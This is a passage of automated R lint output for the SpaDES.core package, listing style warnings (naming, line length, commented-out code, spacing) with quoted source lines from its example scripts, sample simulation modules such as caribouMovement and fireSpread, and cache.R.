^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) 